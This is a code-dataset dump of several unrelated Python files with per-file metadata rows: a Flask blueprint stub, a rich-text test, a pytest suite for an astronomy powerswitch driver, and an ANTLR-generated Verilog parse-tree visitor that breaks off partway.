subscription = ET.SubElement(client, "subscription")
error = ET.SubElement(subscription, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
| 48.845436 | 130 | 0.660011 | 34,321 | 314,125 | 5.860406 | 0.003759 | 0.166217 | 0.060775 | 0.072946 | 0.999309 | 0.999309 | 0.999309 | 0.999309 | 0.999309 | 0.999309 | 0 | 0.000073 | 0.213179 | 314,125 | 6,431 | 131 | 48.845436 | 0.813712 | 0.035416 | 0 | 0.999183 | 1 | 0 | 0.158201 | 0.012634 | 0 | 0 | 0 | 0 | 0 | 1 | 0.078227 | false | 0 | 0.000204 | 0 | 0.156659 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
b072f3b50b53d95a34d32e3801e8e7782ec21a12 | 171 | py | Python | app/modules/passport/__init__.py | Eastwu5788/Heron | 646eeaacea77e293c6eccc6dad82a04ece9294a3 | [
"Apache-2.0"
] | 7 | 2018-01-29T02:46:31.000Z | 2018-03-25T11:15:10.000Z | app/modules/passport/__init__.py | Eastwu5788/Heron | 646eeaacea77e293c6eccc6dad82a04ece9294a3 | [
"Apache-2.0"
] | 4 | 2021-06-08T19:38:03.000Z | 2022-03-11T23:18:46.000Z | app/modules/passport/__init__.py | Eastwu5788/Heron | 646eeaacea77e293c6eccc6dad82a04ece9294a3 | [
"Apache-2.0"
] | 1 | 2021-06-12T14:14:35.000Z | 2021-06-12T14:14:35.000Z | from flask import Blueprint
passport = Blueprint('passport', __name__)
from . import login
from . import login_mobile
from . import register_mobile
from . import logout
| 19 | 42 | 0.789474 | 22 | 171 | 5.863636 | 0.454545 | 0.310078 | 0.232558 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.152047 | 171 | 8 | 43 | 21.375 | 0.889655 | 0 | 0 | 0 | 0 | 0 | 0.046784 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.166667 | 0.833333 | 0 | 0.833333 | 0.333333 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
b0ff1fbbb8b91dea9b8a9648c59c683dfde1fd41 | 120 | py | Python | plugins/datafaker/datafaker/tests/test_richtext_creation.py | rafalp/misago-local-dev | 70875c0d327104ad7c1c05de32000c65343c748f | [
"BSD-2-Clause"
] | null | null | null | plugins/datafaker/datafaker/tests/test_richtext_creation.py | rafalp/misago-local-dev | 70875c0d327104ad7c1c05de32000c65343c748f | [
"BSD-2-Clause"
] | null | null | null | plugins/datafaker/datafaker/tests/test_richtext_creation.py | rafalp/misago-local-dev | 70875c0d327104ad7c1c05de32000c65343c748f | [
"BSD-2-Clause"
] | null | null | null | from ..richtext import create_fake_rich_text
def test_fake_rich_text_is_created():
assert create_fake_rich_text()
| 20 | 44 | 0.825 | 19 | 120 | 4.631579 | 0.631579 | 0.272727 | 0.409091 | 0.409091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.116667 | 120 | 5 | 45 | 24 | 0.830189 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 9 |
9ff8156df28193a102dbc0866e1b78d0ed7dc537 | 17,263 | py | Python | tests/unit_tests/logic/powerswitch/test_pegasusUPBIndi.py | mworion/MountWizzard4 | 4e06b29ec2ef70be40e114b911b7bdf2f858a4b1 | [
"Apache-2.0"
] | 16 | 2020-01-11T22:32:26.000Z | 2022-03-31T15:18:14.000Z | tests/unit_tests/logic/powerswitch/test_pegasusUPBIndi.py | mworion/MountWizzard4 | 4e06b29ec2ef70be40e114b911b7bdf2f858a4b1 | [
"Apache-2.0"
] | 196 | 2020-01-16T13:56:01.000Z | 2022-03-29T02:06:51.000Z | tests/unit_tests/logic/powerswitch/test_pegasusUPBIndi.py | mworion/MountWizzard4 | 4e06b29ec2ef70be40e114b911b7bdf2f858a4b1 | [
"Apache-2.0"
] | 6 | 2019-12-01T19:39:33.000Z | 2021-05-27T13:14:20.000Z | ############################################################
# -*- coding: utf-8 -*-
#
# # # # # # #
# ## ## # ## # #
# # # # # # # # # # #
# # ## # ## ## ######
# # # # # # #
#
# Python-based Tool for interaction with the 10micron mounts
# GUI with PyQT5 for python
#
# written in python3, (c) 2019-2021 by mworion
#
# Licence APL2.0
#
###########################################################
# standard libraries
import pytest
import unittest.mock as mock
# external packages
from PyQt5.QtCore import QThreadPool
from PyQt5.QtCore import QObject
from PyQt5.QtCore import pyqtSignal
from indibase.indiBase import Device, Client
# local import
from logic.powerswitch.pegasusUPBIndi import PegasusUPBIndi
from base.driverDataClass import Signals
from base.indiClass import IndiClass
@pytest.fixture(autouse=True, scope='function')
def module_setup_teardown():
class Test(QObject):
threadPool = QThreadPool()
message = pyqtSignal(str, int)
global app
app = PegasusUPBIndi(app=Test(), signals=Signals(), data={})
yield
def test_setUpdateConfig_1():
app.deviceName = ''
suc = app.setUpdateConfig('test')
assert not suc
def test_setUpdateConfig_2():
app.deviceName = 'test'
app.device = None
suc = app.setUpdateConfig('test')
assert not suc
def test_setUpdateConfig_3():
app.deviceName = 'test'
app.device = Device()
with mock.patch.object(app.device,
'getNumber',
return_value={'Test': 1}):
suc = app.setUpdateConfig('test')
assert not suc
def test_setUpdateConfig_4():
app.deviceName = 'test'
app.device = Device()
app.UPDATE_RATE = 1
with mock.patch.object(app.device,
'getNumber',
return_value={'PERIOD': 1}):
suc = app.setUpdateConfig('test')
assert suc
def test_setUpdateConfig_5():
app.deviceName = 'test'
app.device = Device()
app.client = Client()
app.UPDATE_RATE = 0
with mock.patch.object(app.device,
'getNumber',
return_value={'PERIOD': 1}):
with mock.patch.object(app.client,
'sendNewNumber',
return_value=False):
suc = app.setUpdateConfig('test')
assert not suc
def test_setUpdateConfig_6():
app.deviceName = 'test'
app.device = Device()
app.client = Client()
app.UPDATE_RATE = 0
with mock.patch.object(app.device,
'getNumber',
return_value={'PERIOD': 1}):
with mock.patch.object(app.client,
'sendNewNumber',
return_value=True):
suc = app.setUpdateConfig('test')
assert suc
def test_updateText_1():
suc = app.updateText('test', 'test')
assert not suc
def test_updateText_2():
app.data = {'AUTO_DEW.DEW_C': 1,
'VERSION.UPB': 1}
with mock.patch.object(IndiClass,
'updateText',
return_value=True):
suc = app.updateText('test', 'test')
assert not suc
def test_updateText_3():
app.data = {'DRIVER_INFO.DEVICE_MODEL': 'UPB',
'FIRMWARE_INFO.VERSION': '1.4'}
with mock.patch.object(IndiClass,
'updateText',
return_value=True):
suc = app.updateText('test', 'DRIVER_INFO')
assert suc
def test_updateText_4():
app.data = {'DRIVER_INFO.DEVICE_MODEL': 'UPBv2',
'FIRMWARE_INFO.VERSION': '1.5'}
with mock.patch.object(IndiClass,
'updateText',
return_value=True):
suc = app.updateText('test', 'DRIVER_INFO')
assert suc
def test_updateText_5():
app.data = {'DRIVER_INFO.DEVICE_MODEL': 'UPBv2',
'FIRMWARE_INFO.VERSION': '1.4'}
with mock.patch.object(IndiClass,
'updateText',
return_value=True):
suc = app.updateText('test', 'DRIVER_INFO')
assert suc
def test_updateText_6():
app.data = {'DRIVER_INFO.DEVICE_MODEL': 'UPB',
'FIRMWARE_INFO.VERSION': '1.5'}
with mock.patch.object(IndiClass,
'updateText',
return_value=True):
suc = app.updateText('test', 'DRIVER_INFO')
assert suc
def test_updateNumber_1():
suc = app.updateNumber('test', 'test')
assert not suc
def test_updateNumber_2():
app.data = {'AUTO_DEW.DEW_C': 1,
'VERSION.UPB': 1}
with mock.patch.object(IndiClass,
'updateNumber',
return_value=True):
suc = app.updateNumber('test', 'test')
assert suc
def test_updateSwitch_1():
suc = app.updateSwitch('test', 'test')
assert not suc
def test_updateSwitch_2():
app.data = {'AUTO_DEW.AUTO_DEW_ENABLED': 1,
'VERSION.UPB': 2}
with mock.patch.object(IndiClass,
'updateSwitch',
return_value=True):
suc = app.updateSwitch('test', 'test')
assert suc
def test_togglePowerPort_1():
suc = app.togglePowerPort()
assert not suc
def test_togglePowerPort_2():
suc = app.togglePowerPort(port=1)
assert not suc
def test_togglePowerPort_3():
app.device = Device()
with mock.patch.object(app.device,
'getSwitch',
return_value={'POWER_CONTROL_0': 'On'}):
suc = app.togglePowerPort(port=1)
assert not suc
def test_togglePowerPort_4():
app.device = Device()
with mock.patch.object(app.device,
'getSwitch',
return_value={'POWER_CONTROL_1': 'On'}):
suc = app.togglePowerPort(port=1)
assert not suc
def test_togglePowerPort_5():
app.device = Device()
app.isINDIGO = True
with mock.patch.object(app.device,
'getSwitch',
return_value={'OUTLET_1': 'On'}):
suc = app.togglePowerPort(port=1)
assert not suc
def test_togglePowerPort_6():
app.device = Device()
app.isINDIGO = True
with mock.patch.object(app.device,
'getSwitch',
return_value={'OUTLET_1': 'Off'}):
suc = app.togglePowerPort(port=1)
assert not suc
def test_togglePowerPortBoot_1():
suc = app.togglePowerPortBoot()
assert not suc
def test_togglePowerPortBoot_2():
suc = app.togglePowerPortBoot(port=1)
assert not suc
def test_togglePowerPortBoot_3():
app.device = Device()
with mock.patch.object(app.device,
'getSwitch',
return_value={'POWER_PORT_0': 'On'}):
suc = app.togglePowerPortBoot(port=1)
assert not suc
def test_togglePowerPortBoot_4():
app.device = Device()
with mock.patch.object(app.device,
'getSwitch',
return_value={'POWER_PORT_1': 'On'}):
suc = app.togglePowerPortBoot(port=1)
assert not suc
def test_togglePowerPortBoot_5():
app.device = Device()
app.isINDIGO = True
with mock.patch.object(app.device,
'getSwitch',
return_value={'POWER_PORT_1': 'On'}):
suc = app.togglePowerPortBoot(port=1)
assert not suc
def test_togglePowerPortBoot_6():
app.device = Device()
app.isINDIGO = True
with mock.patch.object(app.device,
'getSwitch',
return_value={'POWER_PORT_1': 'Off'}):
suc = app.togglePowerPortBoot(port=1)
assert not suc
def test_togglePowerPortBoot_7():
app.device = Device()
app.isINDIGO = False
with mock.patch.object(app.device,
'getSwitch',
return_value={'POWER_PORT_1': 'Off'}):
suc = app.togglePowerPortBoot(port=1)
assert not suc
def test_toggleHubUSB_1():
suc = app.toggleHubUSB()
assert not suc
def test_toggleHubUSB_2():
suc = app.toggleHubUSB()
assert not suc
def test_toggleHubUSB_3():
app.device = Device()
with mock.patch.object(app.device,
'getSwitch',
return_value={'test': 'On'}):
suc = app.toggleHubUSB()
assert not suc
def test_toggleHubUSB_4():
app.device = Device()
with mock.patch.object(app.device,
'getSwitch',
return_value={'INDI_ENABLED': 'On',
'INDI_DISABLED': 'Off'}):
suc = app.toggleHubUSB()
assert not suc
def test_toggleHubUSB_5():
app.device = Device()
app.isINDIGO = True
with mock.patch.object(app.device,
'getSwitch',
return_value={'INDI_ENABLED': 'On',
'INDI_DISABLED': 'Off'}):
suc = app.toggleHubUSB()
assert not suc
def test_toggleHubUSB_6():
app.device = Device()
with mock.patch.object(app.device,
'getSwitch',
return_value={'INDI_ENABLED': 'Off',
'INDI_DISABLED': 'On'}):
suc = app.toggleHubUSB()
assert not suc
def test_togglePortUSB_1():
suc = app.togglePortUSB()
assert not suc
def test_togglePortUSB_2():
suc = app.togglePortUSB(port='1')
assert not suc
def test_togglePortUSB_3():
app.device = Device()
with mock.patch.object(app.device,
'getSwitch',
return_value={'PORT_1': 'On'}):
suc = app.togglePortUSB(port='1')
assert not suc
def test_togglePortUSB_4():
app.device = Device()
with mock.patch.object(app.device,
'getSwitch',
return_value={'PORT_1': 'On'}):
suc = app.togglePortUSB(port='0')
assert not suc
def test_togglePortUSB_5():
app.device = Device()
app.isINDIGO = True
with mock.patch.object(app.device,
'getSwitch',
return_value={'PORT_1': 'On'}):
suc = app.togglePortUSB(port='0')
assert not suc
def test_togglePortUSB_6():
app.device = Device()
with mock.patch.object(app.device,
'getSwitch',
return_value={'PORT_0': 'Off'}):
suc = app.togglePortUSB(port='0')
assert not suc
def test_toggleAutoDew_1():
suc = app.toggleAutoDew()
assert not suc
def test_toggleAutoDew_2():
app.device = Device()
app.modelVersion = 1
suc = app.toggleAutoDew()
assert not suc
def test_toggleAutoDew_2b():
app.device = Device()
app.modelVersion = 0
suc = app.toggleAutoDew()
assert not suc
def test_toggleAutoDew_3():
app.device = Device()
with mock.patch.object(app.device,
'getSwitch',
return_value={'INDI_ENABLED': 'On',
'INDI_DISABLED': 'On',
'DEW_A': 'On',
'DEW_B': 'On',
'DEW_C': 'On',
}):
suc = app.toggleAutoDew()
assert not suc
def test_toggleAutoDew_4():
app.device = Device()
with mock.patch.object(app.device,
'getSwitch',
return_value={'INDI_ENABLED': 'On',
'INDI_DISABLED': 'On',
'DEW_A': 'On',
'DEW_B': 'On',
'DEW_C': 'On',
}):
suc = app.toggleAutoDew()
assert not suc
def test_toggleAutoDew_5():
app.device = Device()
app.modelVersion = 1
with mock.patch.object(app.device,
'getSwitch',
return_value={'INDI_ENABLED': 'On',
'INDI_DISABLED': 'On',
'DEW_A': 'Off',
'DEW_B': 'On',
'DEW_C': 'On',
}):
suc = app.toggleAutoDew()
assert not suc
def test_toggleAutoDew_6():
app.device = Device()
app.isINDIGO = True
with mock.patch.object(app.device,
'getSwitch',
return_value={'MANUAL': 'On',
'AUTOMATIC': 'Off',
'DEW_A': 'On',
'DEW_B': 'On',
'DEW_C': 'On',
}):
suc = app.toggleAutoDew()
assert not suc
def test_toggleAutoDew_7():
app.device = Device()
app.isINDIGO = True
with mock.patch.object(app.device,
'getSwitch',
return_value={'MANUAL': 'Off',
'AUTOMATIC': 'Off',
'DEW_A': 'Off',
'DEW_B': 'On',
'DEW_C': 'On',
}):
suc = app.toggleAutoDew()
assert not suc
def test_toggleAutoDew_8():
app.device = Device()
app.modelVersion = 1
with mock.patch.object(app.device,
'getSwitch',
return_value={'INDI_ENABLED': 'Off',
'INDI_DISABLED': 'On',
'DEW_A': 'On',
'DEW_B': 'On',
'DEW_C': 'On',
}):
suc = app.toggleAutoDew()
assert not suc
def test_toggleAutoDew_9():
app.device = Device()
app.modelVersion = 2
with mock.patch.object(app.device,
'getSwitch',
return_value={'INDI_ENABLED': 'On',
'INDI_DISABLED': 'On',
'DEW_A': 'Off',
'DEW_B': 'On',
'DEW_C': 'On',
}):
suc = app.toggleAutoDew()
assert not suc
def test_sendDew_1():
suc = app.sendDew()
assert not suc
def test_sendDew_2():
suc = app.sendDew(port=1)
assert not suc
def test_sendDew_3():
app.device = Device()
with mock.patch.object(app.device,
'getNumber',
return_value={'DEW_1': 50}):
suc = app.sendDew(port=1)
assert not suc
def test_sendDew_4():
app.device = Device()
with mock.patch.object(app.device,
'getNumber',
return_value={'DEW_1': 50}):
suc = app.sendDew(port='A')
assert not suc
def test_sendDew_5():
app.device = Device()
app.isINDIGO = 'On'
with mock.patch.object(app.device,
'getNumber',
return_value={'OUTLET_1': 50}):
suc = app.sendDew(port='A')
assert not suc
def test_sendAdjustableOutput_1():
suc = app.sendAdjustableOutput()
assert not suc
def test_sendAdjustableOutput_2():
suc = app.sendAdjustableOutput()
assert not suc
def test_sendAdjustableOutput_3():
app.device = Device()
with mock.patch.object(app.device,
'getNumber',
return_value={'ADJUSTABLE_VOLTAGE': 12}):
suc = app.sendAdjustableOutput()
def test_sendAdjustableOutput_4():
app.device = Device()
app.isINDIGO = True
with mock.patch.object(app.device,
'getNumber',
return_value={'ADJUSTABLE_VOLTAGE': 12}):
suc = app.sendAdjustableOutput()
assert not suc
def test_reboot_1():
suc = app.reboot()
assert not suc
def test_reboot_2():
app.device = Device()
suc = app.reboot()
assert not suc
def test_reboot_3():
app.device = Device()
app.isINDIGO = True
suc = app.reboot()
assert not suc
def test_reboot_4():
app.device = Device()
app.isINDIGO = True
with mock.patch.object(app.device,
'getSwitch',
return_value={'REBOOT': 'On'}):
suc = app.reboot()
assert not suc
| 28.207516 | 68 | 0.493483 | 1,672 | 17,263 | 4.938995 | 0.080144 | 0.079559 | 0.075079 | 0.098087 | 0.874667 | 0.853354 | 0.794623 | 0.783725 | 0.769194 | 0.705498 | 0 | 0.014632 | 0.390315 | 17,263 | 611 | 69 | 28.253682 | 0.769976 | 0.018073 | 0 | 0.7593 | 0 | 0 | 0.092199 | 0.012226 | 0 | 0 | 0 | 0 | 0.137856 | 1 | 0.142232 | false | 0 | 0.019694 | 0 | 0.16849 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b049bc26e5dce6102d0bd1e2e781f95e959b9c90 | 52,913 | py | Python | verpy/parser/VerexVisitor.py | bynoud/verpy | 33a7bfa42a306f0fd8c2845a2b3fc390bc4d3d2b | [
"MIT"
] | null | null | null | verpy/parser/VerexVisitor.py | bynoud/verpy | 33a7bfa42a306f0fd8c2845a2b3fc390bc4d3d2b | [
"MIT"
] | null | null | null | verpy/parser/VerexVisitor.py | bynoud/verpy | 33a7bfa42a306f0fd8c2845a2b3fc390bc4d3d2b | [
"MIT"
] | null | null | null | # Generated from Verex.g4 by ANTLR 4.7.1
from antlr4 import *
# This class defines a complete generic visitor for a parse tree produced by VerexParser.
class VerexVisitor(ParseTreeVisitor):
# Visit a parse tree produced by VerexParser#vfile.
def visitVfile(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#description.
def visitDescription(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#module_declaration.
def visitModule_declaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#integer_declaration.
def visitInteger_declaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#integer_kw.
def visitInteger_kw(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#HeaderPortName.
def visitHeaderPortName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#HeaderPortAssign.
def visitHeaderPortAssign(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#port_reference.
def visitPort_reference(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#port_declaration.
def visitPort_declaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#list_of_port_identifiers_wrange.
def visitList_of_port_identifiers_wrange(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#port_identifier_wrange.
def visitPort_identifier_wrange(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#local_parameter_declaration.
def visitLocal_parameter_declaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#parameter_declaration_.
def visitParameter_declaration_(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#net_declaration.
def visitNet_declaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#list_of_net_identifiers.
def visitList_of_net_identifiers(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#net_identifier_wrange.
def visitNet_identifier_wrange(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#net_lvalue.
def visitNet_lvalue(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#net_concatenation_value.
def visitNet_concatenation_value(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#variable_lvalue.
def visitVariable_lvalue(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#expression.
def visitExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#inc_or_dec_expression.
def visitInc_or_dec_expression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#primary.
def visitPrimary(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#hierid_reference.
def visitHierid_reference(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#escaped_hierarchical_identifier.
def visitEscaped_hierarchical_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#simple_hierarchical_identifier.
def visitSimple_hierarchical_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#conditional_statement.
def visitConditional_statement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#stat_if.
def visitStat_if(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#stat_elseif.
def visitStat_elseif(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#stat_else.
def visitStat_else(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#function_conditional_statement.
def visitFunction_conditional_statement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#funct_stat_if.
def visitFunct_stat_if(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#funct_stat_elseif.
def visitFunct_stat_elseif(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#funct_stat_else.
def visitFunct_stat_else(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#arrayed_identifier.
def visitArrayed_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#regex_arrayed_identifier.
def visitRegex_arrayed_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#identifier.
def visitIdentifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#list_of_parameter_assignments.
def visitList_of_parameter_assignments(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#equal_parameter_assignment.
def visitEqual_parameter_assignment(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#module_instance.
def visitModule_instance(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#special_port_connection.
def visitSpecial_port_connection(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#comma_special_port_connection.
def visitComma_special_port_connection(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#list_of_port_connections.
def visitList_of_port_connections(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#mixed_port_connection.
def visitMixed_port_connection(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#comma_mixed_port_connection.
def visitComma_mixed_port_connection(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#port_connection_expression.
def visitPort_connection_expression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#range_.
def visitRange_(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#range_expression.
def visitRange_expression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#dimension.
def visitDimension(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#text_macro_definition.
def visitText_macro_definition(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#text_macro_name.
def visitText_macro_name(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#list_of_formal_arguments.
def visitList_of_formal_arguments(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#text_macro_identifier.
def visitText_macro_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#formal_argument_identifier.
def visitFormal_argument_identifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#macro_text.
def visitMacro_text(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#text_macro_usage.
def visitText_macro_usage(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#config_declaration.
def visitConfig_declaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#design_statement.
def visitDesign_statement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#config_rule_statement.
def visitConfig_rule_statement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#default_clause.
def visitDefault_clause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#inst_clause.
def visitInst_clause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#inst_name.
def visitInst_name(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#liblist_clause.
def visitLiblist_clause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#cell_clause.
def visitCell_clause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#use_clause.
def visitUse_clause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#source_text.
def visitSource_text(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#module_keyword.
def visitModule_keyword(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#module_parameter_port_list.
def visitModule_parameter_port_list(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#list_of_ports.
def visitList_of_ports(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#list_of_port_declarations.
def visitList_of_port_declarations(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#port_expression.
def visitPort_expression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#module_item.
def visitModule_item(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#module_or_generate_item.
def visitModule_or_generate_item(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#non_port_module_item.
def visitNon_port_module_item(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#module_or_generate_item_declaration.
def visitModule_or_generate_item_declaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#parameter_override.
def visitParameter_override(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#parameter_declaration.
def visitParameter_declaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#specparam_declaration.
def visitSpecparam_declaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#inout_declaration.
def visitInout_declaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#input_declaration.
def visitInput_declaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#output_declaration.
def visitOutput_declaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#event_declaration.
def visitEvent_declaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#genvar_declaration.
def visitGenvar_declaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#time_declaration.
def visitTime_declaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#real_declaration.
def visitReal_declaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#realtime_declaration.
def visitRealtime_declaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#reg_declaration.
def visitReg_declaration(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#net_type.
def visitNet_type(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#output_variable_type.
def visitOutput_variable_type(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#real_type.
def visitReal_type(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#variable_type.
def visitVariable_type(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#drive_strength.
def visitDrive_strength(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#strength0.
def visitStrength0(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#strength1.
def visitStrength1(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#charge_strength.
def visitCharge_strength(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#delay3.
def visitDelay3(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#delay2.
def visitDelay2(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#delay_value.
def visitDelay_value(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#list_of_event_identifiers.
def visitList_of_event_identifiers(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#list_of_genvar_identifiers.
def visitList_of_genvar_identifiers(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by VerexParser#list_of_port_identifiers.
def visitList_of_port_identifiers(self, ctx):
return self.visitChildren(ctx)
